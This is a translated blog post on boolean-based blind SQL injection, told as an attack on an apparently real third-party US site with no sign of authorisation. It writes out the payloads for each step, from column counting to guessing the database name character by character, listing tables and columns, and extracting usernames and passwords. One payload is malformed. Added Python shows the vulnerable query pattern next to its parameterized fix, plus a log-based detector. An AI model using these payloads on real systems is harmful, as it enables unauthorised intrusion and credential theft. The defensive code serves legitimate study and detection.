Notes on the principle of blind injection

Disclaimer: this article is the blogger's original work, released under the CC 4.0 BY-SA license; when reproducing it, please attach the original source link and this statement.
This link: https://blog.csdn.net/qq_23066945/article/details/102771383


Some time ago I found a site in the US with an injection point that turned out to be blind, so here is a brief explanation of how blind injection works.

Steps

1. Putting a single quote at the ID position of xxx.com/index.php?ID=79 causes an error, and the page shows the error message directly.
From it we learn that the table is called catalog and that the value is enclosed in single quotes.

SQL: SELECT * FROM catalog WHERE ID = '79''
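To show where the behaviour in step 1 comes from, here is an added example that is not part of the original post. It builds a throwaway in-memory SQLite table standing in for the site's catalog table (the columns and rows are assumptions) and contrasts the string-concatenated query with a parameterized one. SQLite has no database() function, so the constructed probes compare a literal of length 10 in its place; that literal is also an assumption, chosen to match the length found later in the post.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the page's catalog table (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE catalog (ID INTEGER, title TEXT)")
    conn.executemany("INSERT INTO catalog VALUES (?, ?)",
                     [(79, "item 79"), (80, "item 80")])
    return conn


def lookup_vulnerable(conn, user_id):
    """The pattern behind step 1: the request parameter is pasted into the SQL text.

    A lone quote makes the statement unparseable (the error page), while a
    well-formed tail such as ' AND <condition> -- is executed as SQL, so the
    page content now depends on <condition>.
    """
    sql = f"SELECT * FROM catalog WHERE ID = '{user_id}'"
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


def lookup_parameterized(conn, user_id):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    rows = conn.execute("SELECT * FROM catalog WHERE ID = ?", (user_id,)).fetchall()
    return ("ok", rows)


def responses_distinguishable(lookup, conn):
    """Re-create the length test of step 4 against either lookup.

    SQLite has no database(); the constructed example compares a literal of
    length 10 instead (an assumption). Returns True when the two probes yield
    different responses, i.e. when the application acts as a true/false oracle.
    """
    true_probe = "79' AND length('sedimental') > 9 -- "
    false_probe = "79' AND length('sedimental') > 10 -- "
    return lookup(conn, true_probe) != lookup(conn, false_probe)


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", responses_distinguishable(lookup_vulnerable, db))    # True
    print("parameterized:", responses_distinguishable(lookup_parameterized, db))  # False
```

With concatenation the two probes produce a row and an empty result respectively, which is the yes/no signal the rest of the post relies on; with a bound parameter both probes are just a non-matching ID and return the same empty result, so there is nothing to infer from.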

2. Try to close the quote: after entering '--+ the page returns to normal.
3. Start guessing the number of columns.
Enter

ID=79' order by 5--+

The textbook error comes back: the error message says there is no fifth column.

Unknown column '5' in 'order clause'

Continue and try entering

ID=79' order by 4--+

The page returns normally, which means the table currently has four columns.
4. Look at the returned information.
Enter:

ID=79' select 1,2,3,4 --+

After many tries nothing is displayed, so switch to blind injection.
By this point his table name has already come out, but I chose to look at a different table, so I start from scratch.
Enter:

ID=79' and length(database())>10 --+

This checks whether his database name is longer than 10 characters; an error is returned.
Continuing the test with "greater than 9" returns normally.
To pin it down, enter:

ID=79' and length(database())=10 --+

This confirms that his database name is 10 characters long.
5. Start guessing the database name.
First guess the first letter; open an ASCII table.
The database name should consist of letters from a to z.
Type:

ID=79' and ascii(substr(database(),1,1))>122 --+

Is the ASCII code of the first letter of the database name greater than 122? An error is returned.
Next, test whether it is greater than 50: returns true. Continue.
Greater than 75: returns true.
Finally, an ASCII code of 115 for the first letter of the database name returns normally.
115 corresponds to s, so the first letter of the database name is s.
Testing the second character the same way gives ASCII code 101, which corresponds to the character e.
6. With the method above, the database was finally determined to be called sedimental.
Next, enumerate the tables:

and ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1))>0--+

This payload was not intuitive to a rookie like me, so let's look at it in a local MySQL environment.
Enter:

select table_name from information_schema.tables where table_schema=database()

It directly displays the table names in the current database.
Entering the payload shown above returns multiple rows.
So use the limit clause:
limit 0,1 -> the first row of data
limit 1,2 -> rows starting from the second row of data
This way the table is taken one row at a time.
Enter:

and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>0 --+

Interpretation: is the ASCII code of the first letter of the first table name greater than 0?
And so on, to get the first table, then the second table.
7. Enumerate the columns

and ascii(substr((select column_name from information_schema.columns where table_name='xxxx' limit 0,1),1,1))>0

8. Extract the content

and ascii(substr((select username,password from xxxx limit 0,1),1,1))>0

Same principle as above.
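On the defensive side, the whole sequence from step 3 to step 6 leaves a recognisable trail in the web server's access log: one client sends a burst of requests whose query strings carry order by N, and length(, ascii(substr( and information_schema, and gets a mixture of error and normal responses back. The following Python is an added example, not part of the original post, that runs a small detector over constructed Apache-style log lines (the client addresses, timestamps, status codes and sizes are invented); it decodes each query string, looks for those primitives, aggregates per client and records the comparison values of the character probes, whose narrowing (122, 50, 75) is the signature of the guessing in step 5.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines; the client addresses, timestamps,
# statuses and sizes are invented for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2019:10:01:01 +0800] "GET /index.php?ID=79 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2019:10:01:05 +0800] "GET /index.php?ID=79%27 HTTP/1.1" 500 312
203.0.113.5 - - [10/Oct/2019:10:01:09 +0800] "GET /index.php?ID=79%27+order+by+5--+ HTTP/1.1" 500 312
203.0.113.5 - - [10/Oct/2019:10:01:12 +0800] "GET /index.php?ID=79%27+order+by+4--+ HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2019:10:01:20 +0800] "GET /index.php?ID=79%27+and+length%28database%28%29%29%3E10+--+ HTTP/1.1" 200 4870
203.0.113.5 - - [10/Oct/2019:10:01:31 +0800] "GET /index.php?ID=79%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3E122+--+ HTTP/1.1" 200 4870
203.0.113.5 - - [10/Oct/2019:10:01:33 +0800] "GET /index.php?ID=79%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3E50+--+ HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2019:10:01:35 +0800] "GET /index.php?ID=79%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3E75+--+ HTTP/1.1" 200 5120
198.51.100.7 - - [10/Oct/2019:10:02:00 +0800] "GET /index.php?ID=80 HTTP/1.1" 200 5100
198.51.100.7 - - [10/Oct/2019:10:02:04 +0800] "GET /search.php?q=order+form HTTP/1.1" 200 2200
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Probing primitives used in the walkthrough, matched against the decoded,
# lower-cased query string.
PRIMITIVES = {
    "column_count_probe": re.compile(r"\border\s+by\s+\d+"),
    "length_probe": re.compile(r"\band\s+length\s*\("),
    "char_probe": re.compile(r"\bascii\s*\(\s*substr\s*\("),
    "schema_read": re.compile(r"\binformation_schema\."),
}
# Comparison value of a character probe, e.g. the 122 in ...,1,1))>122
CHAR_THRESHOLD_RE = re.compile(r"ascii\s*\(\s*substr\s*\(.*?\)\s*\)\s*>\s*(\d+)")


def parse_line(line):
    """Return ip, status, size and the decoded query for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = m.group("url")
    raw_query = url.split("?", 1)[1] if "?" in url else ""
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "size": int(m.group("size")),
        "query": unquote_plus(raw_query).lower(),
    }


def classify(query):
    """Names of the probing primitives present in a decoded query string."""
    return {name for name, rx in PRIMITIVES.items() if rx.search(query)}


def analyze(log_text, min_hits=3):
    """Aggregate probing requests per client and flag clients with at least min_hits."""
    per_ip = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        prims = classify(rec["query"])
        if not prims:
            continue
        entry = per_ip.setdefault(
            rec["ip"],
            {"hits": 0, "primitives": set(), "statuses": set(), "char_thresholds": []},
        )
        entry["hits"] += 1
        entry["primitives"] |= prims
        entry["statuses"].add(rec["status"])
        if "char_probe" in prims:
            t = CHAR_THRESHOLD_RE.search(rec["query"])
            if t:
                entry["char_thresholds"].append(int(t.group(1)))
    alerts = {}
    for ip, e in per_ip.items():
        if e["hits"] >= min_hits:
            alerts[ip] = {
                "hits": e["hits"],
                "primitives": e["primitives"],
                # the same client receiving both error and normal pages is the oracle at work
                "mixed_responses": len(e["statuses"]) > 1,
                "char_thresholds": e["char_thresholds"],
            }
    return alerts


if __name__ == "__main__":
    for ip, alert in analyze(SAMPLE_LOG).items():
        print(ip, alert)
```

The matching is deliberately done on the decoded query (the --+ in the post arrives as %27 and + in the raw log), and the innocuous search for "order form" from the second client shows why the patterns insist on the full order by N shape rather than a single keyword. In a real deployment the same aggregation would be keyed per client and time window, with the threshold list and response-size variance feeding the alert.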

End.

Finally, if there is any problem with this, I hope the experienced folks will point it out.
